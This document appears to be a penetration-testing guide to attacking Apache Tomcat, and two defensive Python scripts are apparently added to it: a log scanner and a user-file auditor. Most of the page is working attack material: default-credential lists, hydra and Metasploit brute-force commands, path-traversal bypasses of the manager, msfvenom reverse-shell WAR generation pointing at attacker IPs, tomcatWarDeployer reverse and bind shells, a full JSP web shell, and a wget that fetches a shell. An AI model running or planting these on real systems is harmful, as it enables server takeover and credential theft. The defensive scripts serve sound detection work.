
Tomcat



Discovery

  • It usually runs on port 8080
  • Common Tomcat error page

Enumeration

Version

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"

Locate the manager files

It is interesting to find where the pages /manager and /host-manager are located, since they may have different names. You can brute-force them.

Username enumeration

In some versions prior to Tomcat 6 you could enumerate users:

msf> use auxiliary/scanner/http/tomcat_enum

Default credentials

The most interesting Tomcat path is /manager/html: from there you can upload and deploy WAR files (execute code). This path is protected by basic HTTP authentication; the most common credentials are:

  • admin:admin
  • tomcat:tomcat
  • admin:<NOTHING>
  • admin:s3cr3t
  • tomcat:s3cr3t
  • admin:tomcat

You can test these and more credentials with:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Another interesting Tomcat path is /manager/status, where you can see the OS and Tomcat versions. This is useful for finding vulnerabilities affecting that Tomcat version when you cannot access /manager/html.

Brute force

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST tomcat-site.internal
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP>

Vulnerabilities

Password backtrace disclosure

Try to access /auth.jsp; if you are very lucky it may disclose the password in a backtrace.

Double URL encoding

A well-known vulnerability is the one in mod_jk from CVE-2007-1860, which allows a double-URL-encoded path traversal to reach the application manager.

To access the Tomcat management web, go to: pathTomcat/%252E%252E/manager/html

Note that in order to upload a webshell you may need to use the double URL encoding trick and send a cookie and/or an SSRF token.
To access the backdoor you may also need to use the double URL encoding trick.

/examples

The following example scripts ship with Apache Tomcat v4.x - v7.x and can be used by attackers to obtain information about the system. These scripts are also known to be vulnerable to cross-site scripting (XSS) injection (from here).

  • /examples/jsp/num/numguess.jsp
  • /examples/jsp/dates/date.jsp
  • /examples/jsp/snp/snoop.jsp
  • /examples/jsp/error/error.html
  • /examples/jsp/sessions/carts.html
  • /examples/jsp/checkbox/check.html
  • /examples/jsp/colors/colors.html
  • /examples/jsp/cal/login.html
  • /examples/jsp/include/include.jsp
  • /examples/jsp/forward/forward.jsp
  • /examples/jsp/plugin/plugin.jsp
  • /examples/jsp/jsptoserv/jsptoservlet.jsp
  • /examples/jsp/simpletag/foo.jsp
  • /examples/jsp/mail/sendmail.jsp
  • /examples/servlet/HelloWorldExample
  • /examples/servlet/RequestInfoExample
  • /examples/servlet/RequestHeaderExample
  • /examples/servlet/RequestParamExample
  • /examples/servlet/CookieExample
  • /examples/servlet/JndiServlet
  • /examples/servlet/SessionExample
  • /tomcat-docs/appdev/sample/web/hello.jsp

Path traversal (..;/)

In some vulnerable Tomcat configurations you can reach protected directories in Tomcat using the path /..;/

So, for example, you may be able to reach the Tomcat manager page by requesting: www.vulnerable.com/lalala/..;/manager/html

Another way to bypass protected paths with this trick is to request http://www.vulnerable.com/;param=value/manager/html
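From the defender's side, all three manager-bypass shapes described on this page (the `..;/` segment, a `;param=value` segment in front of /manager, and the double-encoded `%252E%252E` traversal) leave a recognisable trace in the access log, and a deploy through /manager/text or /manager/html is itself worth alerting on. The following scanner is an added example written for this page, not HackTricks code; the log lines are constructed in Tomcat's default AccessLogValve "common" pattern, and the request regex, category names and sample IPs are assumptions.

```python
"""Flag Tomcat manager-bypass and deploy requests in access-log lines.

Added example for this page (not HackTricks or Tomcat code). The sample
log, the "common" log pattern and the finding labels are constructed.
"""
import re
from urllib.parse import unquote

# Constructed sample lines (AccessLogValve pattern="common").
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /docs/ HTTP/1.1" 200 1234
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /lalala/..;/manager/html HTTP/1.1" 401 0
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /;param=value/manager/html HTTP/1.1" 401 0
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /app/%252E%252E/manager/html HTTP/1.1" 404 0
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "POST /manager/text/deploy?path=/x HTTP/1.1" 200 20
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /myapp/index.jsp HTTP/1.1" 200 500
"""

# ip, ident, user, [timestamp], "METHOD path protocol", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(path: str) -> list[str]:
    """Return the bypass/deploy techniques visible in one request path."""
    findings = []
    if "..;/" in path:
        findings.append("dot-dot-semicolon")
    # a ';key=value' path segment somewhere before a manager path
    if re.search(r";[^/]*=[^/]*/.*manager", path):
        findings.append("path-param-segment")
    # '%252E' decodes to '%2E' and only on a second decode to '.', so a
    # traversal that appears only after decoding twice is double-encoded
    once = unquote(path)
    if once != path and ".." in unquote(once) and ".." not in once:
        findings.append("double-url-encoding")
    # any WAR deployment through the manager app deserves review
    if re.search(r"/manager/(text|html)/(deploy|upload)", path):
        findings.append("manager-deploy")
    return findings


def scan(log_text: str) -> list[dict]:
    """Parse access-log lines and return the requests that triggered a finding."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        techniques = classify(m["path"])
        if techniques:
            hits.append({"ip": m["ip"], "path": m["path"],
                         "status": m["status"], "techniques": techniques})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ",".join(hit["techniques"]), hit["path"])
```

Note that a 401 or 404 on such a request still matters: the `..;/` and `;param=` tricks are only useful against a misconfigured front-end or proxy, so seeing them at all indicates someone probing for that misconfiguration. Run it against a real log with `scan(open(path).read())`.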

RCE

Finally, if you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).

Limitations

You can only deploy a WAR if you have enough privileges (roles: admin, manager and manager-script). Those details are usually defined in /usr/share/tomcat9/etc/tomcat-users.xml (the path varies by version) (see the POST section).

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

Metasploit is a widely used penetration testing framework for assessing and validating the security of systems. It provides a large set of modules for discovering, exploiting and managing vulnerabilities, and can be used against web applications, operating systems, network devices and other targets.

Its core is a modular architecture: scanners, exploits, payload generators and other modules that can be combined and configured for a specific test.

Metasploit offers a command-line console as well as a graphical interface.

Using it effectively requires some background in penetration testing techniques, but once the basics are understood it becomes a central tool in the workflow.

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom reverse shell

The MSFVenom tool is a powerful payload generator and encoder that is part of the Metasploit Framework. It allows you to create custom payloads for various exploits, including reverse shells.

To generate a reverse shell payload using MSFVenom, you can use the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f war > shell.war

Replace <attacker IP> with your IP address and <attacker port> with the port you want to listen on. This command will generate a Java Server Pages (JSP) payload that establishes a reverse TCP connection to your machine.

The -f war option specifies the output format as a Web Application Archive (WAR) file, which can be deployed on a Tomcat server.

Once you have generated the payload, you can deploy it on a vulnerable Tomcat server. After successful deployment, start a listener on your machine using a tool like Netcat or Metasploit. When the target server executes the payload, it will establish a reverse shell connection back to your machine.

Remember to use this technique responsibly and only on systems that you have proper authorization to test.

msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_PORT> -f war -o revshell.war

Then upload the revshell.war file and access it (/revshell/).

Bind and reverse shell with tomcatWarDeployer.py

In some scenarios this does not work (for example old versions of sun).

Download

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Reverse shell

A reverse shell is a type of shell in which the target machine initiates the connection to the attacker's machine. This allows the attacker to gain remote access to the target machine and execute commands. Reverse shells are commonly used in post-exploitation scenarios to maintain persistent access to a compromised system.

To establish a reverse shell, the attacker typically needs to exploit a vulnerability in a network service running on the target machine. Once the vulnerability is exploited, the attacker can inject malicious code that establishes a connection back to their machine.

There are various tools and techniques available for creating reverse shells, including using netcat, Python, or Metasploit. The choice of tool depends on the specific requirements of the penetration test and the target environment.

It is important to note that the use of reverse shells for unauthorized access to systems is illegal and unethical. Reverse shells should only be used in authorized penetration testing engagements or for educational purposes with proper consent and legal authorization.

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind shell

A bind shell is a type of shell that allows an attacker to gain remote access to a compromised system. It works by binding a shell to a specific port on the target system, allowing the attacker to connect to that port and gain control over the system.

To create a bind shell, the attacker needs to find a vulnerable service running on the target system that allows remote connections. One common target is the Apache Tomcat web server, which is often used to host Java-based web applications.

Once the attacker has identified a vulnerable service, they can exploit it to execute arbitrary commands on the target system. This can be done by injecting malicious code into the service, such as a web application or a configuration file.

Once the malicious code is executed, it opens a network socket on a specific port and waits for a connection from the attacker. When the attacker connects to the port, the bind shell is established, and the attacker gains remote access to the system.

Bind shells can be used for various purposes, such as stealing sensitive information, launching further attacks, or maintaining persistent access to the compromised system.

To protect against bind shell attacks, it is important to keep all software and services up to date with the latest security patches. Additionally, network monitoring and intrusion detection systems can help detect and prevent unauthorized access attempts.

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Using Clusterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Manual method - Web shell

Create a file named index.jsp with this content:

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

You could also install this (it allows upload, download and command execution): http://vonloesch.de/filebrowser.html

Manual method 2

Get a JSP web shell such as this one and create a WAR file:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

The name of the Tomcat credentials file is tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null
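Once tomcat-users.xml is located, the same file that an attacker reads for credentials is the one a defender should audit: the Limitations section above ties WAR deployment to the admin, manager and manager-script roles, and the Default credentials section lists the pairs most commonly tried. The auditor below is an added example written for this page, not HackTricks or Tomcat project code; the sample XML is constructed, it assumes the default plaintext password storage (if a CredentialHandler hashes passwords, the default-credential and length checks do not apply), and it also treats Tomcat's documented manager-gui role as a deploy-capable role even though the page only names the first three.

```python
"""Audit a tomcat-users.xml for default credentials and deploy-capable roles.

Added example for this page (not HackTricks or Tomcat code). The sample
file is constructed; passwords are assumed to be stored in plaintext.
"""
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml (same layout as the real file).
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Z9!kq-long-random" roles="manager-script"/>
  <user username="reader" password="another-long-one" roles="manager-status"/>
</tomcat-users>
"""

# Credential pairs from the "Default credentials" section of this page.
DEFAULT_CREDS = {
    ("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
    ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat"),
}

# Roles named in the Limitations section, plus manager-gui (Tomcat's role
# for the HTML manager interface, which can also upload a WAR).
DEPLOY_ROLES = {"admin", "manager", "manager-script", "manager-gui"}

MIN_PASSWORD_LEN = 12  # assumed policy threshold


def audit(xml_text: str) -> list[dict]:
    """Return one finding record per user that has at least one issue."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        # strip the namespace so the check works with or without xmlns
        if el.tag.split("}")[-1] != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        issues = []
        if (name, password) in DEFAULT_CREDS:
            issues.append("default-credentials")
        if len(password) < MIN_PASSWORD_LEN:
            issues.append("short-password")
        deploy = roles & DEPLOY_ROLES
        if deploy:
            issues.append("can-deploy-war:" + ",".join(sorted(deploy)))
        if issues:
            findings.append({"user": name, "issues": issues})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_TOMCAT_USERS):
        print(finding["user"], "->", "; ".join(finding["issues"]))
```

The point of the role check is that every account it lists is one whose compromise gives code execution on the host, which is the attack the rest of this page describes; the number of such accounts should be as small as possible and none of them should carry a credential from the default list.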

Other ways to obtain Tomcat credentials:

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Other Tomcat scanning tools